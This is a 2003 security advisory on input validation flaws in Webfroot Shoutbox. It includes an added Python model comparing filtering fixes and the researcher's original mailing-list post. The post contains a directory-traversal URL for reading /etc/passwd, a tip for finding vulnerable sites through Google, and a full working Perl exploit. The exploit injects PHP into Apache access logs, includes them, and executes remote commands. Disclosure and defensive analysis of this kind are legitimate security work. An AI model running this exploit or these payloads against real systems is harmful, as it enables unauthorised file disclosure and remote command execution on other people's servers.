Webfroot Shoutbox Input Validation Flaws Let Remote Users View Files and Execute Commands on the System

SecurityTracker Alert ID: 1006877
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 29 2003
Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Advisory: SCAN Associates
Version(s): 2.32 and prior

Description: An input validation vulnerability was reported in Webfroot Shoutbox. A remote user can view files on the system. A remote user can execute arbitrary commands on the system.
SCAN Associates reported that a remote user can read arbitrary files on the system with the privileges of the web server. A remote user can set the 'conf' variable to the desired file name to view the file. A demonstration exploit URL is provided:
http://[target]/shoutbox.php?conf=../../../../../../../etc/passwd
It is also reported that, in version 2.31 and prior versions, a remote user can specify a remote location for the 'conf' variable to cause arbitrary PHP code, including operating system commands, at the remote location to be executed on the target system. The code will run with the privileges of the target server's web daemon. A demonstration exploit script is provided in the Source Message.

Impact: A remote user can view arbitrary files on the system with the privileges of the web daemon. A remote user can execute arbitrary PHP code, including operating system commands, on the target system with the privileges of the web daemon (applies to version 2.31 and prior).

Solution: No solution was available at the time of this entry.
The author of the report has provided the following workaround:
Append to line 48 of shoutbox.php:
$conf = str_replace('./', '', $conf); // to avoid directory traversal
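To make the checks concrete, the following is an added Python model (not code from this advisory, from SCAN Associates or from Webfroot Shoutbox) of what reaches require_once under 2.31, 2.32, the workaround above, and an allowlist replacement. The install directory, the sample inputs and the policy names are constructed for the example. It shows why the workaround only narrows the problem: it strips './' but passes an absolute path such as the access-log paths the attached script tries, so restricting 'conf' to a known file name is the durable fix.

```python
"""Model of the 'conf' handling in shoutbox.php under four policies.

Added example, not code from the advisory or from Webfroot Shoutbox.
INSTALL_DIR, the sample inputs and the policy names are constructed.
"""
import posixpath
import re

INSTALL_DIR = "/var/www/html/shoutbox"   # assumed install directory (constructed)
DEFAULT_CONF = "shoutboxconf.php"         # default file name from shoutbox.php line 43
ALLOWED_CONF = {DEFAULT_CONF}             # the only file the script should ever load

_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def filter_v231(conf):
    """Shoutbox 2.31: the supplied value reaches require_once unchanged."""
    return conf


def filter_v232(conf):
    """Shoutbox 2.32: strip ':' and '%3a', aimed only at http:// includes."""
    return conf.replace(":", "").replace("%3a", "")


def filter_workaround(conf):
    """Advisory workaround on top of 2.32: one left-to-right pass removing './'.
    PHP str_replace and Python str.replace both remove non-overlapping matches
    in a single pass, so the model is faithful to the PHP line."""
    return filter_v232(conf).replace("./", "")


def filter_allowlist(conf):
    """Hardened replacement: accept only a known file name, else fall back."""
    return conf if conf in ALLOWED_CONF else DEFAULT_CONF


def classify(conf):
    """Where require_once would look for an already-filtered value:
    'remote' for a URL wrapper, 'local-inside' for a file under INSTALL_DIR,
    'local-outside' for anything else (traversal or absolute path)."""
    if _SCHEME.match(conf):
        return "remote"
    target = posixpath.normpath(posixpath.join(INSTALL_DIR, conf))
    if target == INSTALL_DIR or target.startswith(INSTALL_DIR + "/"):
        return "local-inside"
    return "local-outside"


def evaluate(policy, conf):
    """Outcome of one policy for one supplied 'conf' value."""
    return classify(policy(conf))


# Constructed sample inputs: the default, a shortened form of the advisory's
# traversal, an absolute log path like those in the attached script, and a URL.
SAMPLES = [
    "shoutboxconf.php",
    "../../../etc/passwd",
    "/var/log/httpd/access_log",
    "http://example.invalid/inject.txt",
]

POLICIES = [
    ("2.31", filter_v231),
    ("2.32", filter_v232),
    ("workaround", filter_workaround),
    ("allowlist", filter_allowlist),
]


def summary():
    """{policy name: {sample: outcome}} for every policy/sample pair."""
    return {name: {s: evaluate(p, s) for s in SAMPLES} for name, p in POLICIES}


if __name__ == "__main__":
    for name, rows in summary().items():
        print(name)
        for conf, outcome in rows.items():
            print(f"  {conf!r:40} -> {outcome}")
```

Running it prints one table per policy. Only the allowlist maps every sample to a file inside the install directory; the 2.32 filter stops the URL include but not traversal, and the workaround stops traversal but still lets an absolute path through.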

Vendor URL: shoutbox.sourceforge.net/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: pokleyzz <pokleyzz@scan-associates.net>
Message History: None.

Source Message Contents

Date: Thu, 29 May 2003 11:52:54 +0800
From: pokleyzz <pokleyzz@scan-associates.net>
Subject: [VulnWatch] Webfroot Shoutbox 2.32 directory traversal and code injection.
Products: Webfroot Shoutbox v 2.32 and below (http://shoutbox.sf.net)
Date: 09 May 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net
Summary: Webfroot Shoutbox 2.32 and below directory traversal and code injection.
Description
===========
Webfroot Shoutbox is a PHP script released under the GPL. Also known as a tagboard
or a blabbox, shoutboxes allow visitors to your website to leave messages to
other visitors quickly and easily.
Details
=======
A user can view any readable file on the system where Webfroot Shoutbox is running by using the
$conf variable.
i) Shoutbox v2.32
shoutbox.php line 43
-------------------------------------------------------------------
if (!isset($conf)) {
    $conf="shoutboxconf.php";
} else {
    # michel v was there
    $conf = str_replace(':', '', $conf); // hi cross-site scripting, bye cross-site scripting
    $conf = str_replace('%3a', '', $conf); // hi cross-site scripting, bye cross-site scripting
}
require_once ($conf);
-------------------------------------------------------------------
ii) Shoutbox v2.31
shoutbox.php line 43
-------------------------------------------------------------------
if (!isset($conf)) {
    $conf="shoutboxconf.php";
}
require_once ($conf);
--------------------------------------------------------------------
Proof of concept
================
a) View any readable file
http://blablabla.com/shoutbox.php?conf=../../../../../../../etc/passwd
b) Remote command execution
i) for version 2.31, a user can remotely include a file.
ii) for version 2.32, a user can use the apache access_log to include php code
[see attachment]
Workaround
==========
Append to line 48 of shoutbox.php
$conf = str_replace('./', '', $conf); // to avoid directory traversal
Tips
====
Searching for ":: Shoutbox" at www.google.com can easily identify vulnerable sites (129,000 results)

Content-Type: application/x-perl; name="jeritan_batinku.pl"
Content-Disposition: inline; filename="jeritan_batinku.pl"

#!/usr/bin/perl
# Webfroot Shoutbox < 2.32 on apache exploit
# by pokleyzz of d'scan clanz
#
# Greet:
# tynon, sk ,wanvadder, flyguy, sutan ,spoonfork, tenukboncit, kerengge_kurus ,
# s0cket370 , b0iler and d'scan clan.
# Shout to:
# #vuln , #mybsd , #mylinux
# Just for fun :). Weekend stuff ..
use IO::Socket;
my $host = "127.0.0.1";
my $port = 80;
my $shoutbox = "shoutbox.php?conf=";
my $shoutboxpath = "/shoutbox";
my $cmd = "ls -l";
my $conn;
my $type;
# Candidate locations of the Apache access log, tried in turn.
my @logs = (
    "/etc/httpd/logs/acces_log",
    "/etc/httpd/logs/acces.log",
    "/var/www/logs/access_log",
    "/var/www/logs/access.log",
    "/usr/local/apache/logs/access_log",
    "/usr/local/apache/logs/access.log",
    "/var/log/apache/access_log",
    "/var/log/apache/access.log",
    "/var/log/httpd/access_log",
    "/var/log/httpd/access.log",
    #"D:/apps/Apache Group/Apache2/logs/access.log"
);
my $qinit = "GET /<?\$h=fopen('/tmp/.ex','w+');fwrite(\$h,'Result:<pre><?system(\$cmd);?></pre>');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n";
if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){
    $type = $ARGV[0];
} else {
    print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\tby pokleyzz of d' scan clan\n\n" ;
    print "Usage: \n jeritan_batinku.pl (x|r) host [command] [path] [port]\n";
    print "\ttype\tx = exploit | r = run command (after run with x option)\n";
    print "\thost\thostname\n";
    print "\tcommand\tcommand to execute on remote server\n";
    print "\tpath\tpath to shoutbox installation ex: /shoutbox\n";
    print "\tport\tport number\n";
    exit;
}
if ($ARGV[1]){
    $host = $ARGV[1];
}
if ($ARGV[2]){
    $cmd = $ARGV[2];
}
if ($ARGV[3]){
    $shoutboxpath = $ARGV[3];
}
if ($ARGV[4]){
    $port = int($ARGV[4]);
}
$cmd =~ s/ /+/g;
sub connect_to {
    #print "[x] Connect to $host on port $port ...\n";
    $conn = IO::Socket::INET->new (
        Proto => "tcp",
        PeerAddr => "$host",
        PeerPort => "$port",
    ) or die "[*] Can't connect to $host on port $port ...\n";
    $conn->autoflush(1);
}
sub connect_end {
    #print "[x] Close connection\n";
    close($conn);
}
sub exploit {
    my $access_log = $_[0];
    my $result = "";
    $access_log =~ s/ /+/g;
    my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\nHost: $host\nConnection: Close\n\n";
    print "$query";
    print "[x] Access log : ", $access_log ,"\n";
    &connect_to;
    print $conn $query;
    while ($line = <$conn>) {
        $result = $line;
        #print $result;
    };
    &connect_end;
}
sub run_cmd {
    my $conf="/tmp/.ex";
    #my $conf="d:/tmp/.ex";
    my $result = "";
    my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\nHost: $host\nConnection: Close\n\n";
    print "[x] Run command ...\n";
    &connect_to;
    print $conn $query;
    while ($line = <$conn>) {
        $result .= $line;
    };
    &connect_end;
    if ($result =~ /Result:/){
        print $result;
    } else {
        print $result;
        print "[*] Failed ...";
    }
}
sub insert_code {
    my $result = "";
    print "[x] Access log : ", $access_log ,"\n";
    print "[x] Insert php code into apache access log ...\n";
    &connect_to;
    print $conn "$qinit";
    while ($line = <$conn>) {
        $result .= $line;
    };
    &connect_end;
    print $result;
}
if ($type eq "x"){
    &insert_code;
    print "[x] Trying to exploit ...\n";
    for ($i = 0;$i <= $#logs; $i++){
        &exploit($logs[$i]);
    }
    &run_cmd;
} else {
    &run_cmd;
}